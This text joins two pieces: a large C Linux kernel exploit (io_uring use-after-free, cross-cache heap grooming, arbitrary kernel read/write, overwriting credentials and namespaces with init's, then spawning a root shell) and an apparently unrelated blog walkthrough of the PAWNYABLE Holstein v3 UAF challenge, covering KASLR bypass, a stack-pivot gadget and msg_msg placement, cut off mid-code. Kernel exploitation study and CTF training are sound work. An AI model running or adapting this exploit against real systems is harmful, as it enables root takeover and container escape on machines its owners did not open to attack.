            if (setns(open("/proc/self/ns/mnt", O_RDONLY), 0) == -1) { err("`setns()`"); }
            if (setns(open("/proc/self/ns/pid", O_RDONLY), 0) == -1) { err("`setns()`"); }
            if (setns(open("/proc/self/ns/net", O_RDONLY), 0) == -1) { err("`setns()`"); }
            char *args[] = {"/bin/sh", NULL, NULL};
            execve(args[0], args, NULL);
        }

        else { sleep(2); }
    }
}

// Set-up environment for exploit
void setup_env(void)
{
    // Make sure a page is a page and we're not on some bullshit machine
    long page_sz = sysconf(_SC_PAGESIZE);
    if (page_sz != 4096L)
    {
        err("Page size was: %ld", page_sz);
    }

    // Pin to CPU 0
    pin_cpu(0);
    info("Pinned process to core-0");

    // Increase FD limit
    increase_fds();

    // Create shared mem
    g_shmem = mmap(
        (void *)0x1337000,
        page_sz,
        PROT_READ | PROT_WRITE,
        MAP_ANONYMOUS | MAP_FIXED | MAP_SHARED,
        -1,
        0
    );
    if (g_shmem == MAP_FAILED) { err("`mmap()` failed"); }
    info("Shared memory @ 0x%lx", g_shmem);

    // Create child
    g_child = fork();
    if (g_child == -1)
    {
        err("`fork()` failed");
    }

    // Child
    if (g_child ==  0)
    {
        child_exec();
    }
    info("Spawned child: %d", g_child);

    // Change our name
    if (prctl(PR_SET_NAME, OUR_TASK, NULL, NULL, NULL) != 0)
    {
        err("`prctl()` failed");
    }

    // Create io ring
    struct io_uring_params params = { 0 };
    if (io_uring_queue_init_params(8, &g_ring, &params))
    {
        err("`io_uring_queue_init_params()` failed");
    }
    info("Created io_uring");

    // Create pipe
    info("Creating pipe...");
    create_pipe();
}

// Decrement file->f_count to 0 and free the filp
void do_uaf(void)
{
    if (io_uring_unregister_files(&g_ring))
    {
        err("`io_uring_unregister_files()` failed");
    }

    // Let the free actually happen
    usleep(100000);
}

// Cross-cache 1:
// Allocate enough objects that we have definitely allocated enough
// slabs to fill up the partial list later when we free an object from each
// slab
void cc_1(void)
{
    // Calculate the amount of objects to spray
    uint64_t spray_amt = (OBJS_PER_SLAB * (CPU_PARTIAL + 1)) * OVERFLOW_FACTOR;
    g_cc1_num = spray_amt;

    // Paranoid
    if (spray_amt > CROSS_CACHE_MAX) { err("Illegal spray amount"); }

    //info("Spraying %lu `filp` objects...", spray_amt);
    for (uint64_t i = 0; i < spray_amt; i++)
    {
        g_cc1_fds[i] = get_test_fd(0);
    }
    usleep(100000);

    return;
}

// Cross-cache 2:
// Allocate OBJS_PER_SLAB to *probably* create a new active slab
void cc_2(void)
{
    // Step 2:
    // Allocate OBJS_PER_SLAB to *probably* create a new active slab
    uint64_t spray_amt = OBJS_PER_SLAB - 1;
    g_cc2_num = spray_amt;

    //info("Spraying %lu `filp` objects...", spray_amt);
    for (uint64_t i = 0; i < spray_amt; i++)
    {
        g_cc2_fds[i] = get_test_fd(0);
    }
    usleep(100000);

    return;
}

// Cross-cache 3:
// Allocate enough objects to definitely fill the rest of the active slab
// and start a new active slab
void cc_3(void)
{
    uint64_t spray_amt = OBJS_PER_SLAB + 1;
    g_cc3_num = spray_amt;

    //info("Spraying %lu `filp` objects...", spray_amt);
    for (uint64_t i = 0; i < spray_amt; i++)
    {
        g_cc3_fds[i] = get_test_fd(0);
    }
    usleep(100000);

    return;
}

// Cross-cache 4:
// Free all the filps from steps 2, and 3. This will place our victim 
// page in the partial list completely empty
void cc_4(void)
{
    //info("Freeing `filp` objects from CC2 and CC3...");
    for (size_t i = 0; i < g_cc2_num; i++)
    {
        close(g_cc2_fds[i]);
    }

    for (size_t i = 0; i < g_cc3_num; i++)
    {
        close(g_cc3_fds[i]);
    }
    usleep(100000);

    return;
}

// Cross-cache 5:
// Free an object for each slab we allocated in Step 1 to overflow the 
// partial list and get our empty slab in the partial list freed
void cc_5(void)
{
    //info("Freeing `filp` objects to overflow CPU partial list...");
    for (size_t i = 0; i < g_cc1_num; i++)
    {
        if (i % OBJS_PER_SLAB == 0)
        {
            close(g_cc1_fds[i]);
        }
    }
    usleep(100000);

    return;
}

// Reset all state associated with a cross-cache attempt
void cc_reset(void)
{
    // Close all the remaining FDs
    info("Resetting cross-cache state...");
    for (size_t i = 0; i < CROSS_CACHE_MAX; i++)
    {
        close(g_cc1_fds[i]);
        close(g_cc2_fds[i]);
        close(g_cc3_fds[i]);
    }

    // Reset number trackers
    g_cc1_num = 0;
    g_cc2_num = 0;
    g_cc3_num = 0;
}

// Do cross cache process
void do_cc(void)
{
    // Start cross-cache process
    cc_1();
    cc_2();

    // Allocate the victim filp
    alloc_victim_filp();

    // Free the victim filp
    do_uaf();

    // Resume cross-cache process
    cc_3();
    cc_4();
    cc_5();

    // Allow pages to be freed
    usleep(100000);
}

void reset_pipe_buf(void)
{
    char buf[4096] = { 0 };
    read(g_pipe.fd[PIPE_READ], buf, 4096);
}

void zero_pipe_buf(void)
{
    char buf[4096] = { 0 };
    write(g_pipe.fd[PIPE_WRITE], buf, 4096);
}

// Offset inside of inode to inode->i_write_hint
#define HINT_OFF 0x8fUL

// By using `fcntl(F_GET_RW_HINT)` we can read a single byte at
// file->inode->i_write_hint
uint64_t read_8_at(unsigned long addr)
{
    // Set the inode address
    uint64_t inode_addr_base = addr - HINT_OFF;

    // Set up the buffer for the arbitrary read
    unsigned char buf[4096] = { 0 };

    // Iterate 8 times to read 8 bytes
    uint64_t val = 0;
    for (size_t i = 0; i < 8; i++)
    {
        // Calculate inode address
        uint64_t target = inode_addr_base + i;

        // Set up a fake file 16 times (number of files per page), we don't know
        // yet which of the 16 slots our UAF file is at
        reset_pipe_buf();
        *(uint64_t *)&buf[0x20]  = target;
        *(uint64_t *)&buf[0x120] = target;
        *(uint64_t *)&buf[0x220] = target;
        *(uint64_t *)&buf[0x320] = target;
        *(uint64_t *)&buf[0x420] = target;
        *(uint64_t *)&buf[0x520] = target;
        *(uint64_t *)&buf[0x620] = target;
        *(uint64_t *)&buf[0x720] = target;
        *(uint64_t *)&buf[0x820] = target;
        *(uint64_t *)&buf[0x920] = target;
        *(uint64_t *)&buf[0xa20] = target;
        *(uint64_t *)&buf[0xb20] = target;
        *(uint64_t *)&buf[0xc20] = target;
        *(uint64_t *)&buf[0xd20] = target;
        *(uint64_t *)&buf[0xe20] = target;
        *(uint64_t *)&buf[0xf20] = target;

        // Create the content
        write(g_pipe.fd[PIPE_WRITE], buf, 4096);

        // Read one byte back
        uint64_t arg = 0;
        if (fcntl(g_uaf_fd, F_GET_RW_HINT, &arg) == -1)
        {
            err("`fcntl()` failed");
        };

        // Add to val
        val |= (arg << (i * 8));
    }

    return val;
}

void read_comm_at(unsigned long addr, char *comm)
{
    // Set the inode address
    uint64_t inode_addr_base = addr - HINT_OFF;

    // Set up the buffer for the arbitrary read
    unsigned char buf[4096] = { 0 };

    // Iterate 15 times to read 15 bytes
    for (size_t i = 0; i < 8; i++)
    {
        // Calculate inode address
        uint64_t target = inode_addr_base + i;

        // Set up a fake file 16 times (number of files per page), we don't know
        // yet which of the 16 slots our UAF file is at
        reset_pipe_buf();
        *(uint64_t *)&buf[0x20]  = target;
        *(uint64_t *)&buf[0x120] = target;
        *(uint64_t *)&buf[0x220] = target;
        *(uint64_t *)&buf[0x320] = target;
        *(uint64_t *)&buf[0x420] = target;
        *(uint64_t *)&buf[0x520] = target;
        *(uint64_t *)&buf[0x620] = target;
        *(uint64_t *)&buf[0x720] = target;
        *(uint64_t *)&buf[0x820] = target;
        *(uint64_t *)&buf[0x920] = target;
        *(uint64_t *)&buf[0xa20] = target;
        *(uint64_t *)&buf[0xb20] = target;
        *(uint64_t *)&buf[0xc20] = target;
        *(uint64_t *)&buf[0xd20] = target;
        *(uint64_t *)&buf[0xe20] = target;
        *(uint64_t *)&buf[0xf20] = target;

        // Create the content
        write(g_pipe.fd[PIPE_WRITE], buf, 4096);

        // Read one byte back
        uint64_t arg = 0;
        if (fcntl(g_uaf_fd, F_GET_RW_HINT, &arg) == -1)
        {
            err("`fcntl()` failed");
        };

        // Add to comm buf
        comm[i] = arg;
    }
}

void write_setup_ctx(char *buf, uint32_t what, uint64_t where)
{
    // Copy our copied real ring fd 
    memcpy(&buf[g_off], g_ring_copy, 256);

    // Set f->f_count to 1 
    uint64_t *count = (uint64_t *)&buf[g_off + 0x38];
    *count = 1;

    // Set f->private_data to our scratch space
    uint64_t *private_data = (uint64_t *)&buf[g_off + 0xc8];
    *private_data = g_scratch;

    // Set ctx->cqe_cached
    size_t cqe_cached = g_scratch + 0x240;
    cqe_cached &= 0xFFF;
    uint64_t *cached_ptr = (uint64_t *)&buf[cqe_cached];
    *cached_ptr = NULL_MEM;

    // Set ctx->cqe_sentinel
    size_t cqe_sentinel = g_scratch + 0x248;
    cqe_sentinel &= 0xFFF;
    uint64_t *sentinel_ptr = (uint64_t *)&buf[cqe_sentinel];

    // We need ctx->cqe_cached < ctx->cqe_sentinel
    *sentinel_ptr = NULL_MEM + 1;

    // Set ctx->rings so that ctx->rings->cq.tail is written to. That is at 
    // offset 0xc0 from cq base address
    size_t rings = g_scratch + 0x10;
    rings &= 0xFFF;
    uint64_t *rings_ptr = (uint64_t *)&buf[rings];
    *rings_ptr = where - 0xc0;

    // Set ctx->cached_cq_tail which is our what
    size_t cq_tail = g_scratch + 0x250;
    cq_tail &= 0xFFF;
    uint32_t *cq_tail_ptr = (uint32_t *)&buf[cq_tail];
    *cq_tail_ptr = what;

    // Set ctx->cq_wait the list head to itself (so that it's "empty")
    size_t real_cq_wait = g_scratch + 0x268;
    size_t cq_wait = (real_cq_wait & 0xFFF);
    uint64_t *cq_wait_ptr = (uint64_t *)&buf[cq_wait];
    *cq_wait_ptr = real_cq_wait;
}

void write_what_where(uint32_t what, uint64_t where)
{
    // Reset the page contents
    reset_pipe_buf();

    // Setup the fake file target ctx
    char buf[4096] = { 0 };
    write_setup_ctx(buf, what, where);

    // Set contents
    write(g_pipe.fd[PIPE_WRITE], buf, 4096);

    // Get an sqe
    struct io_uring_sqe *sqe = NULL;
    sqe = io_uring_get_sqe(&g_ring);
    if (!sqe)
    {
        err("`io_uring_get_sqe()` failed");
    }

    // Set values
    sqe->opcode = IORING_OP_MSG_RING;
    sqe->fd = g_uaf_fd;

    int ret = io_uring_submit(&g_ring);
    if (ret < 0)
    {
        err("`io_uring_submit()` failed");
    }

    // Wait for the completion
    struct io_uring_cqe *cqe;
    ret = io_uring_wait_cqe(&g_ring, &cqe);
}

// So in this kernel code path, after we're done with our write-what-where, the 
// what value actually gets incremented ++ style, so we have to decrement
// the values by one each time.
// Also, we only have a 4 byte write ability so we have to split up the 8 bytes
// into 2 separate writes
void overwrite_cred(void)
{
    uint32_t val_1 = g_cred_what & 0xFFFFFFFF;
    uint32_t val_2 = (g_cred_what >> 32) & 0xFFFFFFFF;

    write_what_where(val_1 - 1, g_cred_where);
    write_what_where(val_2 - 1, g_cred_where + 0x4);
}

void overwrite_real_cred(void)
{
    uint32_t val_1 = g_cred_what & 0xFFFFFFFF;
    uint32_t val_2 = (g_cred_what >> 32) & 0xFFFFFFFF;

    write_what_where(val_1 - 1, g_real_cred_where);
    write_what_where(val_2 - 1, g_real_cred_where + 0x4);
}

void overwrite_nsproxy(void)
{
    uint32_t val_1 = g_nsproxy_what & 0xFFFFFFFF;
    uint32_t val_2 = (g_nsproxy_what >> 32) & 0xFFFFFFFF;

    write_what_where(val_1 - 1, g_nsproxy_where);
    write_what_where(val_2 - 1, g_nsproxy_where + 0x4);
}

// Try to fuzzily validate leaked task addresses lol
int task_valid(uint64_t task)
{
    if ((uint16_t)(task >> 48) == 0xFFFF) { return 1; }
    else { return 0; } 
}

void traverse_tasks(void)
{    
    // Process name buf
    char current_comm[16] = { 0 };

    // Get the next task after init
    uint64_t current_next = read_8_at(g_init_task + TASKS_NEXT_OFF);
    uint64_t current = current_next - TASKS_NEXT_OFF;

    if (!task_valid(current))
    { 
        err("Invalid task after init: 0x%lx", current);    
    }

    // Read the comm
    read_comm_at(current + COMM_OFF, current_comm);
    //printf("    - Address: 0x%lx, Name: '%s'\n", current, current_comm);

    // While we don't have NULL, traverse the list
    while (task_valid(current))
    {
        current_next = read_8_at(current_next);
        current = current_next - TASKS_NEXT_OFF;

        if (current == g_init_task) { break; }

        // Read the comm
        read_comm_at(current + COMM_OFF, current_comm);
        //printf("    - Address: 0x%lx, Name: '%s'\n", current, current_comm);

        // If we find the target comm, save it
        if (!strcmp(current_comm, TARGET_TASK))
        {
            g_target_task = current;
        }

        // If we find our target comm, save it
        if (!strcmp(current_comm, OUR_TASK))
        {
            g_our_task = current;
        }
    }
}

void find_pipe_buf_addr(void)
{
    // Get the base of the files array
    uint64_t files_ptr = read_8_at(g_file_array);
    
    // Adjust the files_ptr to point to our fd in the array
    files_ptr += (sizeof(uint64_t) * g_uaf_fd);

    // Get the address of our UAF file struct
    uint64_t curr_file = read_8_at(files_ptr);

    // Calculate the offset
    g_off = curr_file & 0xFFF;

    // Set the globals
    g_file_addr = curr_file;
    g_pipe_buf = g_file_addr - g_off;

    return;
}

void make_ring_copy(void)
{
    // Get the base of the files array
    uint64_t files_ptr = read_8_at(g_file_array);
    
    // Adjust the files_ptr to point to our ring fd in the array
    files_ptr += (sizeof(uint64_t) * g_ring.ring_fd);

    // Get the address of our UAF file struct
    uint64_t curr_file = read_8_at(files_ptr);

    // Copy all the data into the buffer
    for (size_t i = 0; i < 32; i++)
    {
        uint64_t *val_ptr = (uint64_t *)&g_ring_copy[i * 8];
        *val_ptr = read_8_at(curr_file + (i * 8));
    }
}

// Here, all we're doing is determing what side of the page the UAF file is on,
// if its on the front half of the page, the back half is our scratch space
// and vice versa
void set_scratch_space(void)
{
    g_scratch = g_pipe_buf;
    if (g_off < 0x500) { g_scratch += 0x500; }
}

// We failed cross-cache stage, either because we didnt replace UAF object
void cc_fail(void)
{
    cc_reset();
    close(g_uaf_fd);
    g_uaf_fd = -1;
    release_pipe();
    create_pipe();
    sleep(1);
}

void write_pipe(unsigned char *buf)
{
    if (write(g_pipe.fd[PIPE_WRITE], buf, 4096) == -1)
    {
        err("`write()` failed");
    }
}

int main(int argc, char *argv[])
{
    info("Setting up exploit environment...");
    setup_env();

    // Create a debug buffer
    unsigned char buf[4096] = { 0 };
    memset(buf, 'A', 4096); 

retry_cc:
    // Do cross-cache attempt
    info("Attempting cross-cache...");
    do_cc();

    // Replace UAF file (and page) with pipe page
    write_pipe(buf);

    // Try to `lseek()` which should fail if we succeeded
    if (lseek(g_uaf_fd, 0, SEEK_SET) != -1)
    {
        printf("[!] Cross-cache failed, retrying...");
        cc_fail();
        goto retry_cc;
    }

    // Success
    info("Cross-cache succeeded");
    sleep(1);

    // Leak the `error_entry` pointer
    uint64_t error_entry = read_8_at(ERROR_ENTRY_ADDR);
    info("Leaked `error_entry` address: 0x%lx", error_entry);

    // Make sure it seems kernel-ish
    if ((uint16_t)(error_entry >> 48) != 0xFFFF)
    {
        err("Weird `error_entry` address: 0x%lx", error_entry);
    }

    // Set kernel base
    g_kern_base = error_entry - EE_OFF;
    info("Kernel base: 0x%lx", g_kern_base);

    // Read 8 bytes at that address and see if they match our signature
    uint64_t sig = read_8_at(g_kern_base);
    if (sig != KERNEL_SIGNATURE) 
    {
        err("Bad kernel signature: 0x%lx", sig);
    }

    // Set init_task
    g_init_task = g_kern_base + INIT_OFF;
    info("init_task @ 0x%lx", g_init_task);

    // Get the cred and nsproxy values
    g_cred_what = read_8_at(g_init_task + CRED_OFF);
    g_nsproxy_what = read_8_at(g_init_task + NSPROXY_OFF);

    if ((uint16_t)(g_cred_what >> 48) != 0xFFFF)
    {
        err("Weird init->cred value: 0x%lx", g_cred_what);
    }

    if ((uint16_t)(g_nsproxy_what >> 48) != 0xFFFF)
    {
        err("Weird init->nsproxy value: 0x%lx", g_nsproxy_what);
    }

    info("init cred address: 0x%lx", g_cred_what);
    info("init nsproxy address: 0x%lx", g_nsproxy_what);

    // Traverse the tasks list
    info("Traversing tasks linked list...");
    traverse_tasks();

    // Check to see if we succeeded
    if (!g_target_task) { err("Unable to find target task!"); }
    if (!g_our_task)    { err("Unable to find our task!"); }

    // We found the target task
    info("Found '%s' task @ 0x%lx", TARGET_TASK, g_target_task);
    info("Found '%s' task @ 0x%lx", OUR_TASK, g_our_task);

    // Set where gadgets
    g_cred_where = g_target_task + CRED_OFF;
    g_real_cred_where = g_target_task + REAL_CRED_OFF;
    g_nsproxy_where = g_target_task + NSPROXY_OFF;

    info("Target cred @ 0x%lx", g_cred_where);
    info("Target real_cred @ 0x%lx", g_real_cred_where);
    info("Target nsproxy @ 0x%lx", g_nsproxy_where);

    // Locate our file descriptor table
    g_files = g_our_task + FILES_OFF;
    g_fdt = read_8_at(g_files) + FDT_OFF;
    g_file_array = read_8_at(g_fdt) + FD_ARRAY_OFF;

    info("Our files @ 0x%lx", g_files);
    info("Our file descriptor table @ 0x%lx", g_fdt);
    info("Our file array @ 0x%lx", g_file_array);

    // Find our pipe address
    find_pipe_buf_addr();
    info("UAF file addr: 0x%lx", g_file_addr);
    info("Pipe buffer addr: 0x%lx", g_pipe_buf);

    // Set the global scratch space side of the page
    set_scratch_space();
    info("Scratch space base @ 0x%lx", g_scratch);

    // Make a copy of our real io_uring file descriptor since we need to fake
    // one
    info("Making copy of legitimate io_uring fd...");
    make_ring_copy();
    info("Copy done");

    // Overwrite our task's cred with init's
    info("Overwriting our cred with init's...");
    overwrite_cred();

    // Make sure it's correct
    uint64_t check_cred = read_8_at(g_cred_where);
    if (check_cred != g_cred_what)
    {
        err("check_cred: 0x%lx != g_cred_what: 0x%lx",
            check_cred, g_cred_what);
    }

    // Overwrite our real_cred with init's cred
    sleep(1);
    info("Overwriting our real_cred with init's...");
    overwrite_real_cred();

    // Make sure it's correct
    check_cred = read_8_at(g_real_cred_where);
    if (check_cred != g_cred_what)
    {
        err("check_cred: 0x%lx != g_cred_what: 0x%lx", check_cred, g_cred_what);
    }

    // Overwrite our nsproxy with init's
    sleep(1);
    info("Overwriting our nsproxy with init's...");
    overwrite_nsproxy();

    // Make sure it's correct
    check_cred = read_8_at(g_nsproxy_where);
    if (check_cred != g_nsproxy_what)
    {
        err("check_rec: 0x%lx != g_nsproxy_what: 0x%lx",
            check_cred, g_nsproxy_what);
    }

    info("Creds and namespace look good!");
    
    // Let the child loose
    *(int *)g_shmem = 0x1337;

    sleep(3000);
}

PAWNYABLE UAF Walkthrough (Holstein v3)

2022-10-29T00:00:00+00:00

Introduction

I’ve been wanting to learn Linux Kernel exploitation for some time and a couple months ago @ptrYudai from @zer0pts tweeted that they released the beta version of their website PAWNYABLE!, which is a “resource for middle to advanced learners to study Binary Exploitation”. The first section on the website with material already ready is “Linux Kernel”, so this was a perfect place to start learning.

The author does a great job explaining everything you need to know to get started, things like: setting up a debugging environment, CTF-specific tips, modern kernel exploitation mitigations, using QEMU, manipulating images, per-CPU slab caches, etc, so this blogpost will focus exclusively on my experience with the challenge and the way I decided to solve it. I’m going to try and limit redundant information within this blogpost so if you have any questions, it’s best to consult PAWNYABLE and the other linked resources.

What I Started With

PAWNYABLE ended up being a great way for me to start learning about Linux Kernel exploitation, mainly because I didn’t have to spend any time getting up to speed on a kernel subsystem in order to start wading into the exploitation metagame. For instance, if you are the type of person who learns by doing, and you’re first attempt at learning about this stuff was to write your own exploit for CVE-2022-32250, you would first have to spend a considerable amount of time learning about Netfilter. Instead, PAWNYABLE gives you a straightforward example of a vulnerability in one of a handful of bug-classes, and then gets to work showing you how you could exploit it. I think this strategy is great for beginners like me. It’s worth noting that after having spent some time with PAWNYABLE, I have been able to write some exploits for real world bugs similar to CVE-2022-32250, so my strategy did prove to be fruitful (at least for me).

I’ve been doing low-level binary stuff (mostly on Linux) for the past 3 years. Initially I was very interested in learning binary exploitation but starting gravitating towards vulnerability discovery and fuzzing. Fuzzing has captivated me since early 2020, and developing my own fuzzing frameworks actually lead to me working as a full time software developer for the last couple of years. So after going pretty deep with fuzzing (objectively not that deep as it relates to the entire fuzzing space, but deep for the uninitiated) , I wanted to circle back and learn at least some aspect of binary exploitation that applied to modern targets.

The Linux Kernel, as a target, seemed like a happy marriage between multiple things: it’s relatively easy to write exploits for due to a lack of mitigations, exploitable bugs and their resulting exploits have a wide and high impact, and there are active bounty systems/programs for Linux Kernel exploits. As a quick side-note, there have been some tremendous strides made in the world of Linux Kernel fuzzing in the last few years so I knew that specializing in this space would allow me to get up to speed on those approaches/tools.

So coming into this, I had a pretty good foundation of basic binary exploitation (mostly dated Windows and Linux userland stuff), a few years of C development (to include a few Linux Kernel modules), and some reverse engineering skills.

What I Did

To get started, I read through the following PAWNYABLE sections (section names have been Google translated to English):

Introduction to kernel exploits
kernel debugging with gdb
security mechanism (Overview of Exploitation Mitigations)
Compile and transfer exploits (working with the kernel image)

This was great as a starting point because everything is so well organized you don’t have to spend time setting up your environment, its basically just copy pasting a few commands and you’re off and remotely debugging a kernel via GDB (with GEF even).

Next, I started working on the first challenge which is a stack-based buffer overflow vulnerability in Holstein v1. This is a great starting place because right away you get control of the instruction pointer and from there, you’re learning about things like the way CTF players (and security researchers) often leverage kernel code execution to escalate privileges like prepare_kernel_creds and commit_creds.

You can write an exploit that bypasses mitigations or not, it’s up to you. I started slowly and wrote an exploit with no mitigations enabled, then slowly turned the mitigations up and changed the exploit as needed.

After that, I started working on a popular Linux kernel pwn challenge called “kernel-rop” from hxpCTF 2020. I followed along and worked alongside the following blogposts from @_lkmidas:

This was great because it gave me a chance to reinforce everything I had learned from the PAWNYABLE stack buffer overflow challenge and also I learned a few new things. I also used (https://0x434b.dev/dabbling-with-linux-kernel-exploitation-ctf-challenges-to-learn-the-ropes/) to supplement some of the information.

As a bonus, I also wrote a version of the exploit that utilized a different technique to elevate privileges: overwriting modprobe_path.

After all this, I felt like I had a good enough base to get started on the UAF challenge.

UAF Challenge: Holstein v3

Some quick vulnerability analysis on the vulnerable driver provided by the author states the problem clearly.

char *g_buf = NULL;

static int module_open(struct inode *inode, struct file *file)
{
  printk(KERN_INFO "module_open called\n");

  g_buf = kzalloc(BUFFER_SIZE, GFP_KERNEL);
  if (!g_buf) {
    printk(KERN_INFO "kmalloc failed");
    return -ENOMEM;
  }

  return 0;
}

When we open the kernel driver, char *g_buf gets assigned the result of a call to kzalloc().

static int module_close(struct inode *inode, struct file *file)
{
  printk(KERN_INFO "module_close called\n");
  kfree(g_buf);
  return 0;
}

When we close the kernel driver, g_buf is freed. As the author explains, this is a buggy code pattern since we can open multiple handles to the driver from within our program. Something like this can occur.

We’ve done nothing, g_buf = NULL
We’ve opened the driver, g_buf = 0xffff...a0, and we have fd1 in our program
We’ve opened the driver a second time, g_buf = 0xffff...b0 . The original value of 0xffff...a0 has been overwritten. It can no longer be freed and would cause a memory leak (not super important). We now have fd2 in our program
We close fd1 which calls kfree() on 0xffff...b0 and frees the same pointer we have a reference to with fd2.

At this point, via our access to fd2, we have a use after free since we can still potentially use a freed reference to g_buf. The module also allows us to use the open file descriptor with read and write methods.

static ssize_t module_read(struct file *file,
                           char __user *buf, size_t count,
                           loff_t *f_pos)
{
  printk(KERN_INFO "module_read called\n");

  if (count > BUFFER_SIZE) {
    printk(KERN_INFO "invalid buffer size\n");
    return -EINVAL;
  }

  if (copy_to_user(buf, g_buf, count)) {
    printk(KERN_INFO "copy_to_user failed\n");
    return -EINVAL;
  }

  return count;
}

static ssize_t module_write(struct file *file,
                            const char __user *buf, size_t count,
                            loff_t *f_pos)
{
  printk(KERN_INFO "module_write called\n");

  if (count > BUFFER_SIZE) {
    printk(KERN_INFO "invalid buffer size\n");
    return -EINVAL;
  }

  if (copy_from_user(g_buf, buf, count)) {
    printk(KERN_INFO "copy_from_user failed\n");
    return -EINVAL;
  }

  return count;
}

So with these methods, we are able to read and write to our freed object. This is great for us since we’re free to pretty much do anything we want. We are limited somewhat by the object size which is hardcoded in the code to 0x400.

At a high-level, UAFs are generally exploited by creating the UAF condition, so we have a reference to a freed object within our control, and then we want to cause the allocation of a different object to fill the space that was previously filled by our freed object.

So if we allocated a g_buf of size 0x400 and then freed it, we need to place another object in its place. This new object would then be the target of our reads and writes.

KASLR Bypass

The first thing we need to do is bypass KASLR by leaking some address that is a known static offset from the kernel image base. I started searching for objects that have leakable members and again, @ptrYudai came to the rescue with a catalog on useful Linux Kernel data structures for exploitation. This lead me to the tty_struct which is allocated on the same slab cache as our 0x400 buffer, the kmalloc-1024. The tty_struct has a field called tty_operations which is a pointer to a function table that is a static offset from the kernel base. So if we can leak the address of tty_operations we will have bypassed KASLR. This struct was used by NCCGROUP for the same purpose in their exploit of CVE-2022-32250.

It’s important to note that slab cache that we’re targeting is per-CPU. Luckily, the VM we’re given for the challenge only has one logical core so we don’t have to worry about CPU affinity for this exercise. On most systems with more than one core, we would have to worry about influencing one specific CPU’s cache.

So with our module_read ability, we will simply:

Free g_buf
Create dev_tty structs until one hopefully fills the freed space where g_buf used to live
Call module_read to get a copy of the g_buf which is now actually our dev_tty and then inspect the value of tty_struct->tty_operations.

Here are some snippets of code related to that from the exploit:

// Leak a tty_struct->ops field which is constant offset from kernel base
uint64_t leak_ops(int fd) {
    if (fd < 0) {
        err("Bad fd given to `leak_ops()`");
    }

    /* tty_struct {
        int magic;      // 4 bytes
        struct kref;    // 4 bytes (single member is an int refcount_t)
        struct device *dev; // 8 bytes
        struct tty_driver *driver; // 8 bytes
        const struct tty_operations *ops; (offset 24 (or 0x18))
        ...
    } */

    // Read first 32 bytes of the structure
    unsigned char *ops_buf = calloc(1, 32);
    if (!ops_buf) {
        err("Failed to allocate ops_buf");
    }

    ssize_t bytes_read = read(fd, ops_buf, 32);
    if (bytes_read != (ssize_t)32) {
        err("Failed to read enough bytes from fd: %d", fd);
    }

    uint64_t ops = *(uint64_t *)&ops_buf[24];
    info("tty_struct->ops: 0x%lx", ops);

    // Solve for kernel base, keep the last 12 bits
    uint64_t test = ops & 0b111111111111;

    // These magic compares are for static offsets on this kernel
    if (test == 0xb40ULL) {
        return ops - 0xc39b40ULL;
    }

    else if (test == 0xc60ULL) {
        return ops - 0xc39c60ULL;
    }

    else {
        err("Got an unexpected tty_struct->ops ptr");
    }
}

There’s a confusing part about ANDing off the lower 12 bits of the leaked value and that’s because I kept getting one of two values during multiple runs of the exploit within the same boot. This is probably because there’s two kinds of tty_structs that can be allocated and they are allocated in pairs. This if else if block just handles both cases and solves the kernel base for us. So at this point we have bypassed KASLR because we know the base address the kernel is loaded at.

RIP Control

Next, we need someway to high-jack execution. Luckily, we can use the same data structure, tty_struct as we can write to the object using module_write and we can overwrite the pointer value for tty_struct->ops.

struct tty_operations is a table of function pointers, and looks like this:

struct tty_struct * (*lookup)(struct tty_driver *driver,
			struct file *filp, int idx);
	int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
	void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
	int  (*open)(struct tty_struct * tty, struct file * filp);
	void (*close)(struct tty_struct * tty, struct file * filp);
	void (*shutdown)(struct tty_struct *tty);
	void (*cleanup)(struct tty_struct *tty);
	int  (*write)(struct tty_struct * tty,
		      const unsigned char *buf, int count);
	int  (*put_char)(struct tty_struct *tty, unsigned char ch);
	void (*flush_chars)(struct tty_struct *tty);
	unsigned int (*write_room)(struct tty_struct *tty);
	unsigned int (*chars_in_buffer)(struct tty_struct *tty);
	int  (*ioctl)(struct tty_struct *tty,
		    unsigned int cmd, unsigned long arg);
...SNIP...

These functions are invoked on the tty_struct when certain actions are performed on an instance of a tty_struct. For example, when the tty_struct’s controlling process exits, several of these functions are called in a row: close(), shutdown(), and cleanup().

So our plan, will be to:

Create UAF condition
Occupy free’d memory with tty_struct
Read a copy of the tty_struct back to us in userland
Alter the tty->ops value to point to a faked function table that we control
Write the new data back to the tty_struct which is now corrupted
Do something to the tty_struct that causes a function we control to be invoked

PAWNYABLE tells us that a popular target is invoking ioctl() as the function takes several arguments which are user-controlled.

int  (*ioctl)(struct tty_struct *tty,
		    unsigned int cmd, unsigned long arg);

From userland, we can supply the values for cmd and arg. This gives us some flexibility. The value we can provide for cmd is somewhat limited as an unsigned int is only 4 bytes. arg gives us a full 8 bytes of control over RDX. Since we can control the contents of RDX whenever we invoke ioctl(), we need to find a gadget to pivot the stack to some code in the kernel heap that we can control. I found such a gadget here:

0x14fbea: push rdx; xor eax, 0x415b004f; pop rsp; pop rbp; ret;

We will push a value from RDX onto the stack, and then later pop that value into RSP. When ioctl() returns, we will return to whatever value we called ioctl() with in arg. So the control flow will go something like:

Invoke ioctl() on our corrupted tty_struct
ioctl() has been overwritten by a stack-pivot gadget that places the location of our ROP chain into RSP
ioctl() returns execution to our ROP chain

So now we have a new problem, how do we create a fake function table and ROP chain in the kernel heap AND figure out where we stored them?

Creating/Locating a ROP Chain and Fake Function Table

This is where I started to diverge from the author’s exploitation strategy. I couldn’t quite follow along with the intended solution for this problem, so I began searching for other ways. With our extremely powerful read capability in mind, I remembered the msg_msg struct from @ptrYudai’s aforementioned structure catalog, and realized that the structure was perfect for our purposes as it:

Stores arbitrary data inline in the structure body (not via a pointer to the heap)
Contains a linked-list member that contains the addresses to prev and next messages within the same kernel message queue

So quickly, a strategy began to form. We could:

Create our ROP chain and Fake Function table in a buffe
Send the buffer as the body of a msg_msg struct
Use our module_read capability to read the msg_msg->list.next and msg_msg->list.prev values to know where in the heap at least two of our messages were stored

With this ability, we would know exactly what address to supply as an argument to ioctl() when we invoke it in order to pivot the stack into our ROP chain. Here is some code related to that from the exploit:

// Allocate one msg_msg on the heap
size_t send_message() {
    // Calcuate current queue
    if (num_queue < 1) {
        err("`send_message()` called with no message queues");
    }
    int curr_q = msg_queue[num_queue - 1];

    // Send message
    size_t fails = 0;
    struct msgbuf {
        long mtype;
        char mtext[MSG_SZ];
    } msg;

    // Unique identifier we can use
    msg.mtype = 0x1337;

    // Construct the ROP chain
